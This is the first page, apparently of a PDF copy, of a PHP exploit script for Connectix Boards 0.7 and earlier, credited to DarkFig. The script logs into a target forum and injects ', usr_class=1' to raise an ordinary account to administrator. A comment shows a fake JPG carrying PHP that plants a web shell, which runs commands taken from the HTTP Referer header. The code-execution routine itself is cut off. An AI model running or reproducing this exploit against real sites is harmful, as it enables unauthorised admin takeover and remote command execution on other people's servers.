1 #!/usr/bin/php
2 <?php
3 error_reporting(E_ALL ^ E_NOTICE);
4
5 if($argc < 9) {
6 print("
7
Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit
8
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
9
PHP conditions: none
10
Credits: DarkFig <gmdarkfig@gmail.com>
11
URL: http://www.acid−root.new.fr/
12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
13
Usage: $argv[0] −url <> −usr <> −pwd <> −type <> [Options]
14
Params: −url For example http://victim.com/connectix/
15
−usr The username of your account
16
−pwd The password of your account
17
−type Privilege Escalation(1) or Code execution(2)
18 Options: −proxy If you wanna use a proxy <proxyhost:proxyport>
19
−proxyauth Basic authentification <proxyuser:proxypwd>
20 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
21 "); exit(1);
22 }
23
24 $url = getparam(’url’,1);
25 $user = getparam(’usr’,1);
26 $pass = getparam(’pwd’,1);
27 $type = getparam(’type’,1);
28 $proxy = getparam(’proxy’);
29 $authp = getparam(’proxyauth’);
30 $theme = ’Zephyr’;
31
32 $xpl = new phpsploit();
33 $xpl−>agent("Mozilla Firefox");
34 $xpl−>allowredirection(1);
35 $xpl−>cookiejar(1);
36 if($proxy) $xpl−>proxy($proxy);
37 if($authp) $xpl−>proxyauth($authp);
38
39 print "\nTrying to get logged in";
40 $xpl−>post($url.’index.php?act=login’,"username=$user&password=$pass&remember=on&confirm=Connexion+%21");
41 if(preg_match("#password#",$xpl−>showcookie())) print "\nLogged in";
42 else exit("\nExploit failed");
43
44 sploit(", usr_class=1");
45 if($type==1) exit("\nDone, $user is now admin.");
46
47 # Fake JPG (with php code) generated with edjpgcom.exe
48 #
49 # <?php $handle=fopen(’mdrpipicacalolxdwtf.gif.php’,’w+’);
50 # fwrite($handle,’<?php @system($_SERVER[HTTP_REFERER]); ?/>’);
51 # fclose($handle); unlink($_SERVER[PHP_SELF]); ?/>
52 #
Page 1/16
Connectix Boards 0.7 p_skin Multiple Vulnerabilities Exploit
DarkFig
02/21/